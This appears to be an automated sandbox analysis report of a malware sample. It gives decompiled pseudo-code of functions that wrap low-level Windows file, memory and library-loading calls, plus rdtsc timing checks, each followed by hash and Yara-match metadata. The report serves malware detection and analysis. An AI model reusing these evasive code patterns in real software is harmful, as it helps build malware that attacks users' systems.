                                              • ChooseColorW.COMDLG32(00000024), ref: 002FCA9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ChooseColor
                                              • String ID: $$HY0
                                              • API String ID: 2281747019-3994700921
                                              • Opcode ID: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction ID: b252ff451443ef245a48edfba134aa7b02e4529d1b699c573de1526c769efafe
                                              • Opcode Fuzzy Hash: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction Fuzzy Hash: 22F017B4D052099FCB81DFA9D9496AEBBF4BB08310F20456AD908F3340E7755A44CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F540D(char _a4) {
                                              				struct HINSTANCE__** _t5;
                                              
                                              				if(_a4 == 0) {
                                              					_t5 = 0x305620;
                                              					do {
                                              						if( *_t5 != 0) {
                                              							if( *_t5 != 0xffffffff) {
                                              								FreeLibrary( *_t5);
                                              							}
                                              							 *_t5 =  *_t5 & 0x00000000;
                                              						}
                                              						_t5 =  &(_t5[1]);
                                              					} while (_t5 != 0x305670);
                                              				}
                                              				return 1;
                                              			}




                                              0x002f5416
                                              0x002f5419
                                              0x002f541e
                                              0x002f5421
                                              0x002f5426
                                              0x002f542a
                                              0x002f542a
                                              0x002f5430
                                              0x002f5430
                                              0x002f5433
                                              0x002f5436
                                              0x002f543e
                                              0x002f5442

                                              APIs
                                              • FreeLibrary.KERNEL32(00305620), ref: 002F542A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: V0$pV0
                                              • API String ID: 3664257935-2562600905
                                              • Opcode ID: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction ID: 55738b24e014b095ddc245c200214a5d48684adbd488d9da3631c053ac046ecb
                                              • Opcode Fuzzy Hash: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction Fuzzy Hash: 40E04F3682196E9ADB320E08E408371BAD49750376F95553AD6DC121E092751CE1DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              C-Code - Quality: 37%
                                              			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                              				void* _t18;
                                              				void* _t27;
                                              				intOrPtr* _t28;
                                              
                                              				_t13 = _a4;
                                              				_t28 = _a4 + 0xc48;
                                              				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                              				_t4 =  &_a40; // 0x413a21
                                              				_t6 =  &_a32; // 0x413d62
                                              				_t12 =  &_a8; // 0x413d62
                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                              				return _t18;
                                              			}






                                              0x00418283
                                              0x0041828f
                                              0x00418297
                                              0x0041829c
                                              0x004182a2
                                              0x004182bd
                                              0x004182c5
                                              0x004182c9

                                              APIs
                                              • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: !:A$b=A$b=A
                                              • API String ID: 2738559852-704622139
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                              				char* _v8;
                                              				struct _EXCEPTION_RECORD _v12;
                                              				struct _OBJDIR_INFORMATION _v16;
                                              				char _v536;
                                              				void* _t15;
                                              				struct _OBJDIR_INFORMATION _t17;
                                              				struct _OBJDIR_INFORMATION _t18;
                                              				void* _t30;
                                              				void* _t31;
                                              				void* _t32;
                                              
                                              				_v8 =  &_v536;
                                              				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                              				_t31 = _t30 + 0xc;
                                              				if(_t15 != 0) {
                                              					_t17 = E0041AF80(__eflags, _v8);
                                              					_t32 = _t31 + 4;
                                              					__eflags = _t17;
                                              					if(_t17 != 0) {
                                              						E0041B200( &_v12, 0);
                                              						_t32 = _t32 + 8;
                                              					}
                                              					_t18 = E00419310(_v8);
                                              					_v16 = _t18;
                                              					__eflags = _t18;
                                              					if(_t18 == 0) {
                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                              						return _v16;
                                              					}
                                              					return _t18;
                                              				} else {
                                              					return _t15;
                                              				}
                                              			}













                                              0x00409b4c
                                              0x00409b4f
                                              0x00409b54
                                              0x00409b59
                                              0x00409b63
                                              0x00409b68
                                              0x00409b6b
                                              0x00409b6d
                                              0x00409b75
                                              0x00409b7a
                                              0x00409b7a
                                              0x00409b81
                                              0x00409b89
                                              0x00409b8c
                                              0x00409b8e
                                              0x00409ba2
                                              0x00000000
                                              0x00409ba4
                                              0x00409baa
                                              0x00409b5e
                                              0x00409b5e
                                              0x00409b5e

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                              				long _t21;
                                              				void* _t31;
                                              
                                              				_t3 = _a4 + 0xc40; // 0xc40
                                              				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                              				return _t21;
                                              			}





                                              0x004181df
                                              0x004181e7
                                              0x0041821d
                                              0x00418221

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004183AB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				long _t14;
                                              				void* _t22;
                                              
                                              				_t10 = _a4;
                                              				_t3 = _t10 + 0xc60; // 0xca0
                                              				E00418DD0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t14;
                                              			}





                                              0x004183b3
                                              0x004183bf
                                              0x004183c7
                                              0x004183e9
                                              0x004183ed

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b4e6d97a70927d1d60bab166e2990d466c4e8aa077a0043a66107b8214f3a8e6
                                              • Instruction ID: 3a7883d157d8d0faf4c3d46eeeddaa747892696c1025efc3d0660398bcdfef1f
                                              • Opcode Fuzzy Hash: b4e6d97a70927d1d60bab166e2990d466c4e8aa077a0043a66107b8214f3a8e6
                                              • Instruction Fuzzy Hash: 72F01CB5200109AFDB14DF99DC81EE777ADEF98754F118249FA0997241C631E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				long _t14;
                                              				void* _t21;
                                              
                                              				_t3 = _a4 + 0xc60; // 0xca0
                                              				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t14;
                                              			}





                                              0x004183bf
                                              0x004183c7
                                              0x004183e9
                                              0x004183ed

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00418300(intOrPtr _a4, void* _a8) {
                                              				long _t8;
                                              				void* _t11;
                                              
                                              				_t5 = _a4;
                                              				_t2 = _t5 + 0x10; // 0x300
                                              				_t3 = _t5 + 0xc50; // 0x409753
                                              				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                              				_t8 = NtClose(_a8); // executed
                                              				return _t8;
                                              			}





                                              0x00418303
                                              0x00418306
                                              0x0041830f
                                              0x00418317
                                              0x00418325
                                              0x00418329

                                              APIs
                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e49b5097e5ad962e2ccb37cd7a11106a84db660daf06c13d1fcc0c13a9bed26c
                                              • Instruction ID: aa529a304de5efea45915dff3f74c193e3c42c010c6c24d9f83afaf70620f6fe
                                              • Opcode Fuzzy Hash: e49b5097e5ad962e2ccb37cd7a11106a84db660daf06c13d1fcc0c13a9bed26c
                                              • Instruction Fuzzy Hash: 569002A134100442D10071998414F061006E7E1341F51C115E2058668DC659CD567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 41ca395f750439391be8623e41c0354288d27200f936384c1016b1a9252600c9
                                              • Instruction ID: 8e034ab1d7abc4466898f49e4442d39af7644b7ae0532c19ea4f6314dd8ec14f
                                              • Opcode Fuzzy Hash: 41ca395f750439391be8623e41c0354288d27200f936384c1016b1a9252600c9
                                              • Instruction Fuzzy Hash: 3C9002A120200003410571998414A16500BA7E0341B51C121E20086A4DC56589957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: bef2cd16f73423c823fe0b67028aeb82523c743ab7164cd85b6e65b356f531d8
                                              • Instruction ID: 8eacc946bbb62ec7da5f576c13f0c1719315c652112c0583beb929210b0d278c
                                              • Opcode Fuzzy Hash: bef2cd16f73423c823fe0b67028aeb82523c743ab7164cd85b6e65b356f531d8
                                              • Instruction Fuzzy Hash: 759002B120100402D14071998404B461006A7D0341F51C111E6058668EC6998ED976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7cea2f4e1205d510e5fd6741f5ee9ce9e57d9832b6e566dfaef7ff07b4bfbcc7
                                              • Instruction ID: e511bd5610fd18e2da9cda754206d1d04cd9f9e7d0dfc7f24cb2fbf8aa1912a1
                                              • Opcode Fuzzy Hash: 7cea2f4e1205d510e5fd6741f5ee9ce9e57d9832b6e566dfaef7ff07b4bfbcc7
                                              • Instruction Fuzzy Hash: 42900265211000030105B59947049071047A7D5391351C121F2009664CD66189656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c0312717e6f6fb9d1b7c5740666a85ce5b8bd5a1b926f6d722cf347997e2d7a4
                                              • Instruction ID: 3f9a65094d79671797c00552e9269afc547ca94ea83590d49ee127cd634e461d
                                              • Opcode Fuzzy Hash: c0312717e6f6fb9d1b7c5740666a85ce5b8bd5a1b926f6d722cf347997e2d7a4
                                              • Instruction Fuzzy Hash: FC90026160100502D10171998404A16100BA7D0381F91C122E2018669ECA658A96B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1947508f1b5032040be71deafd9b17fb907006a324c29f9bc9205e76de5855a1
                                              • Instruction ID: 85d22207b41630ddc3566af77209025053ada46f7e8fedd27fb9922170d95eaf
                                              • Opcode Fuzzy Hash: 1947508f1b5032040be71deafd9b17fb907006a324c29f9bc9205e76de5855a1
                                              • Instruction Fuzzy Hash: D7900261242041525545B19984049075007B7E0381791C112E2408A64CC566995AE661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a151fd499bbe13fd066f79f211004bfc0cb18b5bc6a06e441073a71f581e8ccc
                                              • Instruction ID: dc7a1fe354a36f4df1643c6ca22cbbcbfcfa29542d83aabdac3176fefd88aab5
                                              • Opcode Fuzzy Hash: a151fd499bbe13fd066f79f211004bfc0cb18b5bc6a06e441073a71f581e8ccc
                                              • Instruction Fuzzy Hash: 9C90027120100413D11171998504B07100AA7D0381F91C512E141866CDD6968A56B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c639f006d3914f94eb4cbf682430a7ce2617b8c99293534ce349003b296f701c
                                              • Instruction ID: 5c730060f7a4627c9912d9e1cb07e20efe2b2bd05dd8592b0650d9e3d6b193b0
                                              • Opcode Fuzzy Hash: c639f006d3914f94eb4cbf682430a7ce2617b8c99293534ce349003b296f701c
                                              • Instruction Fuzzy Hash: C290026921300002D18071999408A0A1006A7D1342F91D515E100966CCC955896D6361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: de0167cb829e370190a5174a0ab3762118ccc12ce3a72714f3958c27ac9858da
                                              • Instruction ID: 1704be02e4e3dcedd42d3583eb4a340a10daacd00b72e6207f93d7637bfc1f73
                                              • Opcode Fuzzy Hash: de0167cb829e370190a5174a0ab3762118ccc12ce3a72714f3958c27ac9858da
                                              • Instruction Fuzzy Hash: 6590026130100003D14071999418A065006F7E1341F51D111E1408668CD955895A6262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1cbb9a8b7d26ef635fe5c05bb916ff2434b752b4c6cd81a77ff6734897828e0
                                              • Instruction ID: 74148c2ef332bf8b703a2e0e022714aae06c9731ed15051c38eb9a226a209bd0
                                              • Opcode Fuzzy Hash: d1cbb9a8b7d26ef635fe5c05bb916ff2434b752b4c6cd81a77ff6734897828e0
                                              • Instruction Fuzzy Hash: B190027131114402D1107199C404B061006A7D1341F51C511E181866CDC6D589957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e00dcb4bdf2deb1dcaad6590e1057735a1898c16f6d8008bd8077f0327d9ced6
                                              • Instruction ID: 5757d0b072a2eaf576b74c786af9809ffe22e878be40d3f9cfdac65f4219f172
                                              • Opcode Fuzzy Hash: e00dcb4bdf2deb1dcaad6590e1057735a1898c16f6d8008bd8077f0327d9ced6
                                              • Instruction Fuzzy Hash: 7A90027120100402D10075D99408A461006A7E0341F51D111E6018669EC6A589957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 99895d9b2ad2a124072d73d713d0a11e000198fa559e0c2902bb65c5f2070412
                                              • Instruction ID: 76e6af412832ddc9c47f435fe82822f2b102dba1cf339c8a45ccc41bd34e025b
                                              • Opcode Fuzzy Hash: 99895d9b2ad2a124072d73d713d0a11e000198fa559e0c2902bb65c5f2070412
                                              • Instruction Fuzzy Hash: 7C90027120108802D1107199C404B4A1006A7D0341F55C511E541876CDC6D589957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ab294cc1a2c130dff4ec6481955a1a38c54cb911116f26b6dc88a11151d2a6dc
                                              • Instruction ID: f5bc457093758cd2b710cb3200a2f35364105494050cd5aca1c1a4f0e57abf62
                                              • Opcode Fuzzy Hash: ab294cc1a2c130dff4ec6481955a1a38c54cb911116f26b6dc88a11151d2a6dc
                                              • Instruction Fuzzy Hash: FA90027120140402D10071998814B0B1006A7D0342F51C111E2158669DC665895575B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8006055305b526b6d3f017ac431b7c54dba002709249949aa98e43e2fd9edbfe
                                              • Instruction ID: 6bce2194fa6e2b0e3e27dd795f6705c9994494c64ac1435ce2d3fccf47d46e6a
                                              • Opcode Fuzzy Hash: 8006055305b526b6d3f017ac431b7c54dba002709249949aa98e43e2fd9edbfe
                                              • Instruction Fuzzy Hash: 5890026160100042414071A9C844D065006BBE1351751C221E198C664DC599896966A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 78744762fdd38fb0644960d7e03e74a9ef9d6fb0889bfb90dad990a5e5e85af6
                                              • Instruction ID: adb6832af13e6c9adac2fa6f0e3c8216cccfdc0ac61acf69f79f8d4bcae8c5c1
                                              • Opcode Fuzzy Hash: 78744762fdd38fb0644960d7e03e74a9ef9d6fb0889bfb90dad990a5e5e85af6
                                              • Instruction Fuzzy Hash: A090026121180042D20075A98C14F071006A7D0343F51C215E1148668CC95589656561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d61bb9786c9e9364ad5bbcb5291fb8d6745f359148ceb9aff2ea7480b0e9fe3f
                                              • Instruction ID: 3e7bf87b6cc264a40fb792ac217a31f49bbece66d27eca1b832af23f2126938a
                                              • Opcode Fuzzy Hash: d61bb9786c9e9364ad5bbcb5291fb8d6745f359148ceb9aff2ea7480b0e9fe3f
                                              • Instruction Fuzzy Hash: 1990027120100802D18071998404A4A1006A7D1341F91C115E1019768DCA558B5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E004088C0(intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				char _v24;
                                              				char _v284;
                                              				char _v804;
                                              				char _v840;
                                              				void* _t24;
                                              				void* _t31;
                                              				void* _t33;
                                              				void* _t34;
                                              				void* _t40;
                                              				void* _t53;
                                              				intOrPtr _t56;
                                              				void* _t59;
                                              				void* _t61;
                                              				void* _t62;
                                              				void* _t63;
                                              
                                              				asm("in al, dx");
                                              				_t56 = _a4;
                                              				_t40 = 0; // executed
                                              				_t24 = E00406E10(_t56,  &_v24); // executed
                                              				_t61 = _t59 - 0x344 + 8;
                                              				if(_t24 != 0) {
                                              					E00407020( &_v24,  &_v840);
                                              					_t62 = _t61 + 8;
                                              					do {
                                              						E00419CE0( &_v284, 0x104);
                                              						E0041A350( &_v284,  &_v804);
                                              						_t63 = _t62 + 0x10;
                                              						_t53 = 0x4f;
                                              						while(1) {
                                              							_t31 = E00413DE0(E00413D80(_t56, _t53),  &_v284);
                                              							_t63 = _t63 + 0x10;
                                              							if(_t31 != 0) {
                                              								break;
                                              							}
                                              							_t53 = _t53 + 1;
                                              							if(_t53 <= 0x62) {
                                              								continue;
                                              							} else {
                                              							}
                                              							goto L9;
                                              						}
                                              						_t9 = _t56 + 0x14; // 0xffffe1a5
                                              						 *(_t56 + 0x474) =  *(_t56 + 0x474) ^  *_t9;
                                              						_t40 = 1;
                                              						L9:
                                              						_t33 = E00407050( &_v24,  &_v840);
                                              						_t62 = _t63 + 8;
                                              					} while (_t33 != 0 && _t40 == 0);
                                              					_t34 = E004070D0(_t56,  &_v24); // executed
                                              					if(_t40 == 0) {
                                              						asm("rdtsc");
                                              						asm("rdtsc");
                                              						_v8 = _t34 - 0 + _t34;
                                              						 *((intOrPtr*)(_t56 + 0x55c)) =  *((intOrPtr*)(_t56 + 0x55c)) + 0xffffffba;
                                              					}
                                              					 *((intOrPtr*)(_t56 + 0x31)) =  *((intOrPtr*)(_t56 + 0x31)) + _t40;
                                              					_t20 = _t56 + 0x31; // 0x5608758b
                                              					 *((intOrPtr*)(_t56 + 0x32)) =  *((intOrPtr*)(_t56 + 0x32)) +  *_t20 + 1;
                                              					return 1;
                                              				} else {
                                              					return _t24;
                                              				}
                                              			}



















                                              0x004088c2
                                              0x004088cb
                                              0x004088d3
                                              0x004088d5
                                              0x004088da
                                              0x004088df
                                              0x004088f2
                                              0x004088f7
                                              0x00408900
                                              0x0040890c
                                              0x0040891f
                                              0x00408924
                                              0x00408927
                                              0x00408930
                                              0x00408942
                                              0x00408947
                                              0x0040894c
                                              0x00000000
                                              0x00000000
                                              0x0040894e
                                              0x00408952
                                              0x00000000
                                              0x00000000
                                              0x00408954
                                              0x00000000
                                              0x00408952
                                              0x00408956
                                              0x00408959
                                              0x0040895f
                                              0x00408961
                                              0x0040896c
                                              0x00408971
                                              0x00408974
                                              0x00408981
                                              0x0040898c
                                              0x0040898e
                                              0x00408994
                                              0x00408998
                                              0x0040899b
                                              0x0040899b
                                              0x004089a2
                                              0x004089a5
                                              0x004089aa
                                              0x004089b7
                                              0x004088e1
                                              0x004088e6
                                              0x004088e6

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
